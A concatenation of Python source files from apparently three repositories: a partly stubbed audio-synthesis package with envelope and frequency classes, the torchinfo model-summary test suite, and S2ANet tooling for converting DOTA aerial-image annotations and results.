# fill = Fill(saw, self.envelope)
# return saw.apply(fill)
return saw
#######
def __repr__(self) -> str:
return "Pluck"
#######
@property
def fundamental(self) -> Frequency:
"""Fundamental frequency."""
return self.__fundamental
@property
def amplitude_envelope(self) -> AmplitudeEnvelope:
return self.__amplitude_envelope
class PluckFactory:
@staticmethod
def basic():
envelope = Envelope.from_dict(
{
0: LevelEnvelope.from_dict({1: 1, 17: 0}),
5000: LevelEnvelope.from_dict({1: 1, 9: 0}),
11000: LevelEnvelope.from_dict({1: 1, 6: 0}),
22000: LevelEnvelope.from_dict({1: 1, 4: 0}),
}
)
amp_envelope = AmplitudeEnvelope(0, 1, envelope)
pluck = Pluck(
"Test_Pluck",
fundamental=Frequency(600.0),
amplitude_envelope=amp_envelope,
sampling_parameters=SamplingParameters(),
)
number_of_samples = pluck._sampling_parameters.number_of_samples(
amp_envelope.ending_frame
)
wf = pluck.synthesize()
pluck.save(wf, number_of_samples)
```
#### File: ampl/_tests/test_decibel.py
```python
# from ..decibel import Decibel
# class TestDecibel:
# def test_init(self):
# db = Decibel(-10)
# assert db == -10
# class TestFrom:
# pass
```
#### File: wave/base/point.py
```python
from dataclasses import dataclass
from typing import Generic, GenericAlias, TypeVar
T = TypeVar("T")
U = TypeVar("U")
@dataclass
class _Point(Generic[T, U]):
x: T
y: U
class _Point_(_Point):
@classmethod
def __class_getitem__(cls):
return GenericAlias
class _Display_(_Point):
def __repr__(self) -> str:
return f"({self.x}, {self.y})"
class Point(
_Display_,
_Point_,
_Point,
Generic[T, U],
):
def __init__(self, x: T, y: U):
super(Point, self).__init__(x, y)
```
#### File: wave/fourier/coeff.py
```python
__all__ = ["Coefficients"]
from abc import ABCMeta
from dataclasses import dataclass
from typing import Iterator
from .math import Function
@dataclass(frozen=True)
class _Coefficients:
function: Function
class _Iterate_(Iterator):
def __next__(self):
...
def __iter__(self):
return self
class Coefficients(
_Iterate_,
metaclass=ABCMeta,
):
def __init__(self, fn: Function):
...
```
#### File: wave/freq/angular.py
```python
from __future__ import annotations
from dataclasses import dataclass
from ..time import Duration
from .base import Frequency
__all__ = ["AngularFrequency"]
class _Set_:
def _set(self, val: float):
self._value = val
@dataclass
class _AngularFrequency(_Set_):
_value: float
class _Mutate_(_AngularFrequency):
def mutate(self, val: float):
self._set(val)
class _From_:
@staticmethod
def from_cycle_frequency(freq: Frequency) -> AngularFrequency:
...
@staticmethod
def from_duration(dur: Duration) -> AngularFrequency:
...
class _Into_(_AngularFrequency):
def into_cycle_frequency(self) -> Frequency:
...
class _Convert_(_From_, _Into_):
...
class _Display_(_AngularFrequency):
units = "radians / second"
def __repr__(self) -> str:
return f"{self._value} {self.units}"
class AngularFrequency(
_Convert_,
_Mutate_,
_AngularFrequency,
):
def __init__(self, value: float):
super(AngularFrequency, self).__init__(value)
```
#### File: trackold/param/tempo.py
```python
from dataclasses import dataclass
class _Mutate_:
def mutate_bpm(self, val: float):
self.bpm = val
@dataclass
class _Tempo(_Mutate_):
beats_per_minute: float # mutable
steps_per_beat: int = 4
beats_per_bar: int = 4
# class _Beat(_Tempo):
# beats_per_minute: float # mutable
class _Tempo_(_Tempo):
"""
Pure temporal conversions.
"""
@property
def steps_pm(self) -> float:
return self.bpm * 4
@property
def bars_pm(self) -> float:
return self.bpm / 4
class Tempo(
_Tempo_,
_Tempo,
):
def __init__(
self,
bpm: float,
):
self.bpm = bpm
```
#### File: transformold/_base/effect.py
```python
from abc import ABCMeta, abstractmethod
from dataclasses import dataclass
from ear4.wave import Wave
@dataclass(frozen=True)
class _Effect:
source: Wave # source sound wave
class _Effect_(
_Effect,
metaclass=ABCMeta,
):
@abstractmethod
def apply(self) -> Wave:
"""
Applies effect to return an output wave.
* Main API function for effect.
"""
pass
@abstractmethod
def diff(self) -> Wave:
"""
Difference in waveform from source and result.
"""
pass
class Effect(
_Effect_,
_Effect,
metaclass=ABCMeta,
):
...
```
#### File: transformold/core/q.py
```python
from dataclasses import dataclass
@dataclass
class _Q:
_value: float
class Q(_Q):
def __init__(self, value: float):
super(Q, self).__init__(value)
def create(
self,
anchor: FreqAnchor,
band: FreqBand,
):
...
```
#### File: transformold/echo/echo.py
```python
from typing import List, Iterator
from ..sound.sound import Sound
from .transform import Transform
from pytest import approx
class Echo(Transform):
def __init__(self, sounds: List[Sound], weights: List[float]):
self.__sounds = sounds
self.__weights = weights
def __post_init_(self):
assert sum(self.weights) == approx(1), "Weights must sum to 1."
#######
@property
def sounds(self) -> List[Sound]:
return self.__sounds
@property
def weights(self) -> List[float]:
return self.__weights
@property
def waveform(self) -> Iterator[float]:
ret = 0
for sound, weight in zip(self.sounds, self.weights):
position = yield from sound.waveform
ret += weight * position
return ret
```
#### File: eq/filter/lp.py
```python
from ..base import Frequency
from .vec import Vector
def get_cutoff_ratio(frequency: Frequency, sample_rate: SampleRate):
...
def from_range(start: usize, stop: usize) -> Vector:
def lowpass_filter(cutoff: Frequency, band: Frequency) -> Vector[Frequency]:
...
def spectral_invert():
...
def highpass_filter(cutoff: Frequency, band: Frequency):
...
def highpass_filter(cutoff: Frequency, band: Frequency):
...
```
#### File: eq/filter/vec.py
```python
from __future__ import annotations
from typing import Sequence, TypeVar
import numpy as np
from ..base import Frequency
T = TypeVar("T")
usize = int
class Vector(Sequence, np.ndarray):
def __init__(self, arraylike: Sequence[T]):
super(Vector, self).__init__(arraylike)
```
#### File: wave/transformold/fill.py
```python
from typing import Iterator, List
from pytest import approx
from ..base.envelope import Envelope
from ..base.sound import Sound
from ..base.sinusoid import Sinusoid
from .transform import Transform
class Fill(Transform):
def __init__(self, envelope: Envelope):
self.__envelope = envelope
#######
@property
def envelope(self) -> Envelope:
return self.__envelope
def apply(self, sound: Sound) -> Sound:
sinusoids = (
# TODO: this can be add envelope method in Sinusoid
Sinusoid(
sinusoid.frequency, sinusoid.amplitude, sinusoid.step, self.envelope
)
for sinusoid in sound.sinusoids
)
return Sound(sinusoids)
```
#### File: wave/transformold/transform.py
```python
# from abc import ABCMeta, abstractmethod
# from typing import Iterator
# class Transform(metaclass=ABCMeta):
# def __init__(self):
# pass
# @property
# @abstractmethod
# def waveform(self) -> Iterator[float]:
# pass
```
#### File: transformold/volume/base.py
```python
from ear4.wave import Decibel
from ..base import XY
# TODO: do decibel for now
class VolumeVolume(XY):
def __init__(self):
super().__init__(Decibel, Decibel)
```
#### File: transformold/vv/base.py
```python
from ear4.wave import Volume
from ..base import XY
class VolumeVolume(XY):
def __init__(self):
super().__init__(Volume, Volume)
```
#### File: wave/wave/soundwave.py
```python
# from __future__ import annotations
# from typing import List, Optional, Iterator
# from .sinusoid import Sinusoid
## considering moving this to synth folder
# import numpy as np
# class Soundwave:
# def __init__(
# self,
# sinusoids: List[Sinusoid],
# # origin: Union[Primitive, Transform],
# id: int = 0,
# name: Optional[str] = None,
# ):
# self.__id = id
# self.__sinusoids = sinusoids
# #######
# @property
# def sinusoids(self) -> List[Sinusoid]:
# return self.__sinusoids
# # CHANGE TO POSITION
# @property
# def waveform(self) -> Iterator[float]:
# """This should really be called wave position."""
# # TODO: this has some major issues
# position = 0
# for sinusoid in self.sinusoids:
# position += next(sinusoid.waveform)
# yield position
# # TODO: how can we better leverage generators?
# # this is ugly... clean me!
# def as_array(self, number_of_samples: int) -> np.ndarray:
# arr = np.zeros(number_of_samples)
# for i in range(number_of_samples):
# arr[i] = next(self.waveform)
# return arr
# # TODO: possibly move transforms to sound manager / cursor (also fits with ID)
# ##############
# # TRANSFORMS #
# # def aggregate(self, sounds: List[Sound], weights: List[float]) -> Sound:
# # aggregation = Aggregation(sounds.append(self), weights.append(1 - sum(weights)))
# # return aggregation.apply()
# # def apply(self, transform: Transform) -> Sound:
# # return Sound(
# # waveform=transform.waveform,
# # origin_sound=[self],
# # origin_transform=transform,
# # parameters=self.parameters,
# # )
# # # def delay(self, delaying: Delaying) -> Sound:
# # return delaying.apply(self)
# # def widen(self, widening: Widening) -> Sound:
# # return widening.apply(self)
# # def pan(self, panning: Panning) -> Sound:
# # return panning.apply(self)
# # def distort(self, distortion: Distortion) -> Sound:
# # return distortion.apply(self)
```
#### File: time/envelope/anchor.py
```python
from collections import OrderedDict
from dataclasses import dataclass
from .level import Level
__all__ = ["Anchor"]
@dataclass
class _Anchors:
dict: OrderedDict[int, Level]
class _Anchors_(_Anchors):
def end_block(self) -> int:
return self.dict[end]
class _Validate_(_Anchors_, _Anchors):
def _validate_insert(self):
...
def _validate_append(self, block: int):
assert block > self.end_block()
def _validate_modify(self):
...
def _validate_remove(self, block: int):
assert block in self.dict.keys(), "Block is not in keys."
class _Mutate_(_Validate_, _Anchors):
def insert(self):
...
def append(self):
...
def modify(self, block: int, level: Level):
...
def remove(self):
...
class _Display_(_Anchors):
def __repr__(self):
...
class Anchors(_Anchors_, _Anchors):
def __init__(self):
super().__init__(OrderedDict())
```
#### File: time/envelope/envelope.py
```python
from __future__ import annotations
from collections import OrderedDict
from dataclasses import dataclass
from enum import Enum
from typing import Optional, Sequence
from numpy import interp
import numpy as np
from .level import Level
__all__ = ["Envelope"]
@dataclass
class _Envelope:
anchors: OrderedDict[int, Level]
class _Envelope_:
# ths should just be vector...
def interpolate(self) -> np.ndarray:
...
class _Default_:
@staticmethod
def triangle(self) -> Envelope:
...
class _From_:
@staticmethod
def from_adsr(
attack: Level,
decay: Level,
sustain: Optional[Level] = None,
release: Optional[Level] = None,
):
...
class Envelope(
_Default_,
_Envelope_,
_Envelope,
):
def __init__(self):
...
# class LevelEnvelope:
# """Level envelope (2D)."""
# def __init__(self, anchors: Sequence[LevelAnchor]):
# self.__anchors = {0: 0}
# for anchor in anchors:
# self.add_anchor(anchor)
# # assert (
# # self.anchors[0] == 0
# # ), f"Beginning anchor ({self.anchors[0]}) must be (0, 0)."
# # assert (
# # self.anchors[max(self.anchors.keys())] == 0
# # ), "Ending anchor must have level 0."
# @staticmethod
# def from_dict(anchors: dict[int, int]) -> LevelEnvelope:
# return LevelEnvelope(
# [LevelAnchor(frame, level) for frame, level in anchors.items()]
# )
# # def __repr__(self) -> str:
# # ret = f"""
# # Level Envelope
# # ##############
# # """
# # ret += "\n".join([str(anchor) for anchor in self._anchors])
# # return ret
# @property
# def anchors(self) -> OrderedDict[int, int]:
# return OrderedDict(sorted(self.__anchors.items()))
# def add_anchor(self, anchor: LevelAnchor):
# self.__anchors[anchor.frame] = anchor.level
# def get_level(self, frame: float) -> float:
# assert frame >= 0, "Frame must be positive."
# lower_bound = max(
# (key for key in self.anchors.keys() if key <= frame),
# default=min(key for key in self.anchors.keys()),
# )
# upper_bound = min(
# (key for key in self.anchors.keys() if key >= frame),
# default=max(key for key in self.anchors.keys()),
# )
# return interp(
# frame,
# [lower_bound, upper_bound],
# [self.anchors[lower_bound], self.anchors[upper_bound]],
# )
# @property
# def finish(self) -> float:
# # TODO: this can also be last key
# return max(self.anchors.keys())
# class FrequencyAnchor:
# """Anchor point for envelope."""
# def __init__(self, frequency: int, level_envelope: LevelEnvelope):
# # TODO: make frequency relative later
# self.__frequency = frequency
# self.__level_envelope = level_envelope
# # assert (
# # 0 <= self.level <= 100
# # ), "Level (relative amplitude) must be between 0 and 100."
# @property
# def frequency(self) -> int:
# return self.__frequency
# @property
# def level_envelope(self) -> LevelEnvelope:
# return self.__level_envelope
# class Envelope:
# """Level + Frequency Envelope (3D)."""
# def __init__(self, frequency_anchors: Sequence[FrequencyAnchor]):
# self.__frequency_anchors = {}
# for anchor in frequency_anchors:
# self.add_anchor(anchor)
# @staticmethod
# def from_dict(anchors: dict[int, LevelEnvelope]):
# return Envelope([FrequencyAnchor(key, value) for key, value in anchors.items()])
# @property
# def frequency_anchors(self) -> OrderedDict[int, LevelEnvelope]:
# return OrderedDict(sorted(self.__frequency_anchors.items()))
# # TODO: this needs a test!
# @property
# def ending_frame(self) -> float:
# return max(env.finish for env in self.frequency_anchors.values())
# def add_anchor(self, anchor: FrequencyAnchor):
# self.__frequency_anchors[anchor.frequency] = anchor.level_envelope
# def get_level(self, frame: float, frequency: float) -> float:
# """Level envelope at a frame & frequency."""
# assert frame >= 0
# lower_frequency_bound = max(
# (key for key in self.frequency_anchors.keys() if key <= frequency),
# default=min(key for key in self.frequency_anchors.keys()),
# )
# upper_frequency_bound = min(
# (key for key in self.frequency_anchors.keys() if key >= frequency),
# default=max(key for key in self.frequency_anchors.keys()),
# )
# lower_level = self.frequency_anchors[lower_frequency_bound].get_level(frame)
# upper_level = self.frequency_anchors[upper_frequency_bound].get_level(frame)
# return interp(
# frequency,
# [lower_frequency_bound, upper_frequency_bound],
# [lower_level, upper_level],
# )
# # class AmplitudeEnvelope:
# # def __init__(
# # self,
# # floor: float = 0,
# # ceiling: float = 1,
# # envelope: Optional[Envelope] = None,
# # ):
# # assert ceiling > floor, "Ceiling must be greater than floor."
# # self.__floor = floor
# # self.__ceiling = ceiling
# # self.__envelope = envelope
# # @property
# # def floor(self) -> float:
# # return self.__floor
# # @property
# # def ceiling(self) -> float:
# # return self.__ceiling
# # @property
# # def range(self) -> float:
# # return self.ceiling - self.floor
# # @property
# # def envelope(self) -> Optional[Envelope]:
# # return self.__envelope
# # @property
# # def ending_frame(self) -> Optional[float]:
# # if self.envelope is not None:
# # return self.envelope.ending_frame
# # else:
# # return None
# # def amplitude(self, frame: float, frequency: float) -> float:
# # if self.envelope is None:
# # return self.ceiling
# # else:
# # return self.floor + self.range * self.envelope.get_level(frame, frequency)
# # def mix(self, env: AmplitudeEnvelope, target: AmplitudeEnvelope):
# # pass
# # make simple case of level envelope for now, but do experiment
# # THIS NEEDS TO EVENTUALLY BE EXTENDED TO MODULATION! think precisely about what envelopes are
# # class FrequencyEnvelope:
# # def __init__(
# # self,
# # base: float,
# # target: Optional[float] = None,
# # envelope: Optional[LevelEnvelope] = None,
# # ):
# # self.__base = base
# # self.__target = target
# # self.__envelope = envelope
# # @property
# # def base(self) -> float:
# # return self.__base
# # @property
# # def target(self) -> Optional[float]:
# # return self.__target
# # @property
# # def range(self) -> float:
# # return self.target - self.base
# # @property
# # def envelope(self) -> Optional[LevelEnvelope]:
# # return self.__envelope
# # def frequency(self, frame: float) -> float:
# # if self.envelope is None:
# # return self.base
# # else:
# # return self.base + self.range * self.envelope.get_level(frame)
```
|
{
"source": "jedi2610/torchinfo",
"score": 2
}
|
#### File: torchinfo/tests/torchinfo_test.py
```python
from typing import Any
import torch
from torch import nn
from torch.nn.utils import prune
from tests.conftest import verify_output_str
from tests.fixtures.models import (
AutoEncoder,
ContainerModule,
CustomParameter,
DictParameter,
EmptyModule,
FakePrunedLayerModel,
LinearModel,
LSTMNet,
MixedTrainableParameters,
ModuleDictModel,
MultipleInputNetDifferentDtypes,
NamedTuple,
PackPaddedLSTM,
ParameterListModel,
PartialJITModel,
PrunedLayerNameModel,
RecursiveNet,
ReturnDict,
ReuseLinear,
ReuseLinearExtended,
ReuseReLU,
SiameseNets,
SingleInputNet,
UninitializedParameterModel,
)
from torchinfo import ColumnSettings, summary
from torchinfo.enums import Verbosity
def test_basic_summary() -> None:
model = SingleInputNet()
summary(model)
def test_string_result() -> None:
results = summary(SingleInputNet(), input_size=(16, 1, 28, 28))
result_str = f"{results}\n"
verify_output_str(result_str, "tests/test_output/string_result.out")
def test_single_input() -> None:
model = SingleInputNet()
# input_size keyword arg intentionally omitted.
results = summary(model, (2, 1, 28, 28))
assert len(results.summary_list) == 6, "Should find 6 layers"
assert results.total_params == 21840
assert results.trainable_params == 21840
def test_input_tensor() -> None:
metrics = summary(SingleInputNet(), input_data=torch.randn(5, 1, 28, 28))
assert metrics.input_size == torch.Size([5, 1, 28, 28])
def test_batch_size_optimization() -> None:
model = SingleInputNet()
# batch size intentionally omitted.
results = summary(model, (1, 28, 28), batch_dim=0)
assert len(results.summary_list) == 6, "Should find 6 layers"
assert results.total_params == 21840
assert results.trainable_params == 21840
def test_single_linear_layer() -> None:
model = torch.nn.Linear(2, 5)
results = summary(model)
results = summary(model, input_size=(1, 2))
assert results.total_params == 15
assert results.trainable_params == 15
def test_uninitialized_tensor() -> None:
model = UninitializedParameterModel()
summary(model)
def test_multiple_input_types() -> None:
model = MultipleInputNetDifferentDtypes()
input_size = (1, 300)
if torch.cuda.is_available():
dtypes = [
torch.cuda.FloatTensor, # type: ignore[attr-defined]
torch.cuda.LongTensor, # type: ignore[attr-defined]
]
else:
dtypes = [torch.FloatTensor, torch.LongTensor]
results = summary(model, input_size=[input_size, input_size], dtypes=dtypes)
assert results.total_params == 31120
assert results.trainable_params == 31120
def test_single_input_all_cols() -> None:
model = SingleInputNet()
col_names = ("kernel_size", "input_size", "output_size", "num_params", "mult_adds")
input_shape = (7, 1, 28, 28)
summary(
model,
input_data=torch.randn(*input_shape),
depth=1,
col_names=col_names,
col_width=20,
)
def test_single_input_batch_dim() -> None:
model = SingleInputNet()
col_names = ("kernel_size", "input_size", "output_size", "num_params", "mult_adds")
summary(
model,
input_size=(1, 28, 28),
depth=1,
col_names=col_names,
col_width=20,
batch_dim=0,
)
def test_pruning() -> None:
model = SingleInputNet()
for module in model.modules():
if isinstance(module, (torch.nn.Conv2d, torch.nn.Linear)):
prune.l1_unstructured( # type: ignore[no-untyped-call]
module, "weight", 0.5
)
results = summary(model, input_size=(16, 1, 28, 28))
assert results.total_params == 10965
assert results.total_mult_adds == 3957600
def test_dict_input() -> None:
# TODO: expand this test to handle intermediate dict layers.
model = MultipleInputNetDifferentDtypes()
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
summary(model, input_data={"x1": input_data, "x2": other_input_data})
def test_row_settings() -> None:
model = SingleInputNet()
summary(model, input_size=(16, 1, 28, 28), row_settings=("var_names",))
def test_jit() -> None:
model = LinearModel()
model_jit = torch.jit.script(model)
x = torch.randn(64, 128)
regular_model = summary(model, input_data=x)
jit_model = summary(model_jit, input_data=x)
assert len(regular_model.summary_list) == len(jit_model.summary_list)
def test_partial_jit() -> None:
model_jit = torch.jit.script(PartialJITModel())
summary(model_jit, input_data=torch.randn(2, 1, 28, 28))
def test_custom_parameter() -> None:
model = CustomParameter(8, 4)
summary(model, input_size=(1,))
def test_parameter_list() -> None:
model = ParameterListModel()
summary(
model,
input_size=(100, 100),
verbose=2,
col_names=list(ColumnSettings),
col_width=15,
)
def test_dict_parameters_1() -> None:
model = DictParameter()
input_data = {256: torch.randn(10, 1), 512: [torch.randn(10, 1)]}
summary(model, input_data={"x": input_data, "scale_factor": 5})
def test_dict_parameters_2() -> None:
model = DictParameter()
input_data = {256: torch.randn(10, 1), 512: [torch.randn(10, 1)]}
summary(model, input_data={"x": input_data}, scale_factor=5)
def test_dict_parameters_3() -> None:
model = DictParameter()
input_data = {256: torch.randn(10, 1), 512: [torch.randn(10, 1)]}
summary(model, input_data=[input_data], scale_factor=5)
def test_lstm() -> None:
# results = summary(LSTMNet(), input_size=(100, 1), dtypes=[torch.long])
results = summary(
LSTMNet(),
input_size=(1, 100),
dtypes=[torch.long],
verbose=Verbosity.VERBOSE,
col_width=20,
col_names=("kernel_size", "output_size", "num_params", "mult_adds"),
row_settings=("var_names",),
)
assert len(results.summary_list) == 4, "Should find 4 layers"
def test_lstm_custom_batch_size() -> None:
# batch_size intentionally omitted.
results = summary(LSTMNet(), (100,), dtypes=[torch.long], batch_dim=1)
assert len(results.summary_list) == 4, "Should find 4 layers"
def test_recursive() -> None:
results = summary(RecursiveNet(), input_size=(1, 64, 28, 28))
second_layer = results.summary_list[2]
assert len(results.summary_list) == 7, "Should find 7 layers"
assert (
second_layer.num_params_to_str(reached_max_depth=False) == "(recursive)"
), "should not count the second layer again"
assert results.total_params == 36928
assert results.trainable_params == 36928
assert results.total_mult_adds == 173709312
def test_siamese_net() -> None:
metrics = summary(SiameseNets(), input_size=[(1, 1, 88, 88), (1, 1, 88, 88)])
assert round(metrics.float_to_megabytes(metrics.total_input), 2) == 0.25
def test_container() -> None:
summary(ContainerModule(), input_size=(1, 5), depth=4)
def test_empty_module() -> None:
summary(EmptyModule())
def test_device() -> None:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = SingleInputNet()
# input_size
summary(model, input_size=(5, 1, 28, 28), device=device)
# input_data
input_data = torch.randn(5, 1, 28, 28)
summary(model, input_data=input_data)
summary(model, input_data=input_data, device=device)
summary(model, input_data=input_data.to(device))
summary(model, input_data=input_data.to(device), device=torch.device("cpu"))
def test_pack_padded() -> None:
x = torch.ones([20, 128]).long()
# fmt: off
y = torch.Tensor([
13, 12, 11, 11, 11, 11, 11, 11, 11, 11, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9, 9, 9, 9,
9, 9, 9, 9, 9, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7, 7, 7, 7, 7,
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
6, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4
]).long()
# fmt: on
summary(PackPaddedLSTM(), input_data=x, lengths=y)
def test_module_dict() -> None:
summary(
ModuleDictModel(),
input_data=torch.randn(1, 10, 3, 3),
layer_type="conv",
activation_type="lrelu",
)
def test_model_with_args() -> None:
summary(RecursiveNet(), input_size=(1, 64, 28, 28), args1="args1", args2="args2")
def test_input_size_possibilities() -> None:
test = CustomParameter(2, 3)
summary(test, input_size=[(2,)])
summary(test, input_size=((2,),))
summary(test, input_size=(2,))
summary(test, input_size=[2])
def test_multiple_input_tensor_args() -> None:
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
metrics = summary(
MultipleInputNetDifferentDtypes(), input_data=input_data, x2=other_input_data
)
assert metrics.input_size == torch.Size([1, 300])
def test_multiple_input_tensor_dict() -> None:
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
metrics = summary(
MultipleInputNetDifferentDtypes(),
input_data={"x1": input_data, "x2": other_input_data},
)
assert metrics.input_size == {
"x1": torch.Size([1, 300]),
"x2": torch.Size([1, 300]),
}
def test_multiple_input_tensor_list() -> None:
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
metrics = summary(
MultipleInputNetDifferentDtypes(), input_data=[input_data, other_input_data]
)
assert metrics.input_size == [torch.Size([1, 300]), torch.Size([1, 300])]
def test_namedtuple() -> None:
model = NamedTuple()
input_size = [(2, 1, 28, 28), (2, 1, 28, 28)]
named_tuple = model.Point(*input_size)
summary(model, input_size=input_size, z=named_tuple)
def test_return_dict() -> None:
input_size = [torch.Size([1, 28, 28]), [12]]
metrics = summary(ReturnDict(), input_size=input_size, col_width=65, batch_dim=0)
assert metrics.input_size == [(1, 28, 28), [12]]
def test_containers() -> None:
summary(ContainerModule(), input_size=(5,))
def test_autoencoder() -> None:
model = AutoEncoder()
summary(model, input_size=(1, 3, 64, 64))
def test_reusing_activation_layers() -> None:
act = nn.LeakyReLU(inplace=True)
model1 = nn.Sequential(act, nn.Identity(), act, nn.Identity(), act) # type: ignore[no-untyped-call] # noqa: E501
model2 = nn.Sequential(
nn.LeakyReLU(inplace=True),
nn.Identity(), # type: ignore[no-untyped-call]
nn.LeakyReLU(inplace=True),
nn.Identity(), # type: ignore[no-untyped-call]
nn.LeakyReLU(inplace=True),
)
result_1 = summary(model1)
result_2 = summary(model2)
assert len(result_1.summary_list) == len(result_2.summary_list) == 6
def test_mixed_trainable_parameters() -> None:
result = summary(MixedTrainableParameters(), verbose=Verbosity.VERBOSE)
assert result.trainable_params == 10
assert result.total_params == 20
def test_too_many_linear() -> None:
net = ReuseLinear()
summary(net, (2, 10))
def test_too_many_linear_plus_existing_hooks() -> None:
a, b = False, False
def pre_hook(module: nn.Module, inputs: Any) -> None:
del module, inputs
nonlocal a
a = True
def hook(module: nn.Module, inputs: Any, outputs: Any) -> None:
del module, inputs, outputs
nonlocal b
b = True
net = ReuseLinearExtended()
result_1 = summary(net, (2, 10))
net = ReuseLinearExtended()
net.linear.register_forward_pre_hook(pre_hook)
net.linear.register_forward_hook(hook)
result_2 = summary(net, (2, 10))
assert a is True
assert b is True
assert str(result_1) == str(result_2)
def test_too_many_relus() -> None:
summary(ReuseReLU(), (4, 4, 64, 64))
def test_pruned_adversary() -> None:
model = PrunedLayerNameModel(8, 4)
results = summary(model, input_size=(1,))
assert results.total_params == 32
second_model = FakePrunedLayerModel(8, 4)
results = summary(second_model, input_size=(1,))
assert results.total_params == 32 # should be 64
```
|
{
"source": "jedibobo/S2ANet-custom-dataset",
"score": 2
}
|
#### File: S2ANet-custom-dataset/DOTA_devkit/convert_dota_to_mmdet.py
```python
import os
import os.path as osp
import mmcv
import numpy as np
from PIL import Image
from mmdet.core import poly_to_rotated_box_single
wordname_15 = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field',
'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout',
'harbor', 'swimming-pool', 'helicopter']
label_ids = {name: i + 1 for i, name in enumerate(wordname_15)}
def parse_ann_info(label_base_path, img_name):
lab_path = osp.join(label_base_path, img_name + '.txt')
bboxes, labels, bboxes_ignore, labels_ignore = [], [], [], []
with open(lab_path, 'r') as f:
for ann_line in f.readlines():
ann_line = ann_line.strip().split(' ')
bbox = [float(ann_line[i]) for i in range(8)]
# 8 point to 5 point xywha
bbox = tuple(poly_to_rotated_box_single(bbox).tolist())
class_name = ann_line[8]
difficult = int(ann_line[9])
# ignore difficult =2
if difficult == 0:
bboxes.append(bbox)
labels.append(label_ids[class_name])
elif difficult == 1:
bboxes_ignore.append(bbox)
labels_ignore.append(label_ids[class_name])
return bboxes, labels, bboxes_ignore, labels_ignore
def convert_dota_to_mmdet(src_path, out_path, trainval=True, filter_empty_gt=True, ext='.png'):
"""Generate .pkl format annotation that is consistent with mmdet.
Args:
src_path: dataset path containing images and labelTxt folders.
out_path: output pkl file path
trainval: trainval or test
"""
img_path = os.path.join(src_path, 'images')
label_path = os.path.join(src_path, 'labelTxt')
img_lists = os.listdir(img_path)
data_dict = []
for id, img in enumerate(img_lists):
img_info = {}
img_name = osp.splitext(img)[0]
label = os.path.join(label_path, img_name + '.txt')
img = Image.open(osp.join(img_path, img))
img_info['filename'] = img_name + ext
img_info['height'] = img.height
img_info['width'] = img.width
if trainval:
if not os.path.exists(label):
print('Label:' + img_name + '.txt' + ' Not Exist')
continue
# filter images without gt to speed up training
if filter_empty_gt & (osp.getsize(label) == 0):
continue
bboxes, labels, bboxes_ignore, labels_ignore = parse_ann_info(label_path, img_name)
ann = {}
ann['bboxes'] = np.array(bboxes, dtype=np.float32)
ann['labels'] = np.array(labels, dtype=np.int64)
ann['bboxes_ignore'] = np.array(bboxes_ignore, dtype=np.float32)
ann['labels_ignore'] = np.array(labels_ignore, dtype=np.int64)
img_info['ann'] = ann
data_dict.append(img_info)
mmcv.dump(data_dict, out_path)
if __name__ == '__main__':
convert_dota_to_mmdet('data/dota_1024/trainval_split',
'data/dota_1024/trainval_split/trainval_s2anet.pkl')
convert_dota_to_mmdet('data/dota_1024/test_split',
'data/dota_1024/test_split/test_s2anet.pkl', trainval=False)
print('done!')
```
#### File: bbox/samplers/random_sampler_rotated.py
```python
import torch
from .random_sampler import RandomSampler
from .sampling_result import SamplingResult
from ..builder import BBOX_SAMPLERS
@BBOX_SAMPLERS.register_module
class RandomSamplerRotated(RandomSampler):
def sample(self,
assign_result,
bboxes,
gt_bboxes,
gt_labels=None,
**kwargs):
gt_bboxes = gt_bboxes.float()
bboxes = bboxes.float()
if len(bboxes.shape) < 2:
bboxes = bboxes[None, :]
# this is the only difference between RandomSamplerRotated and RandomSampler
bboxes = bboxes[:, :5]
gt_flags = bboxes.new_zeros((bboxes.shape[0],), dtype=torch.uint8)
if self.add_gt_as_proposals:
bboxes = torch.cat([gt_bboxes, bboxes], dim=0)
assign_result.add_gt_(gt_labels)
gt_ones = bboxes.new_ones(gt_bboxes.shape[0], dtype=torch.uint8)
gt_flags = torch.cat([gt_ones, gt_flags])
num_expected_pos = int(self.num * self.pos_fraction)
pos_inds = self.pos_sampler._sample_pos(
assign_result, num_expected_pos, bboxes=bboxes, **kwargs)
# We found that sampled indices have duplicated items occasionally.
# (may be a bug of PyTorch)
pos_inds = pos_inds.unique()
num_sampled_pos = pos_inds.numel()
num_expected_neg = self.num - num_sampled_pos
# print('Pos:{} Neg:{}'.format(num_sampled_pos,num_expected_neg))
if self.neg_pos_ub >= 0:
_pos = max(1, num_sampled_pos)
neg_upper_bound = int(self.neg_pos_ub * _pos)
if num_expected_neg > neg_upper_bound:
num_expected_neg = neg_upper_bound
neg_inds = self.neg_sampler._sample_neg(
assign_result, num_expected_neg, bboxes=bboxes, **kwargs)
neg_inds = neg_inds.unique()
return SamplingResult(pos_inds, neg_inds, bboxes, gt_bboxes,
assign_result, gt_flags)
```
#### File: core/evaluation/dota_utils.py
```python
import os
import os.path as osp
from ..bbox import rotated_box_to_poly_single
def result2dota_task1(results, dst_path, dataset):
CLASSES = dataset.CLASSES
img_names = dataset.img_names
assert len(results) == len(
img_names), 'length of results must equal with length of img_names'
if not osp.exists(dst_path):
os.mkdir(dst_path)
for classname in CLASSES:
f_out = open(osp.join(dst_path, 'Task1_'+classname+'.txt'), 'w')
print('Task1_'+classname+'.txt')
# per result represent one image
for img_id, result in enumerate(results):
for class_id, bboxes in enumerate(result):
if CLASSES[class_id] != classname:
continue
if(bboxes.size != 0):
for bbox in bboxes:
score = bbox[5]
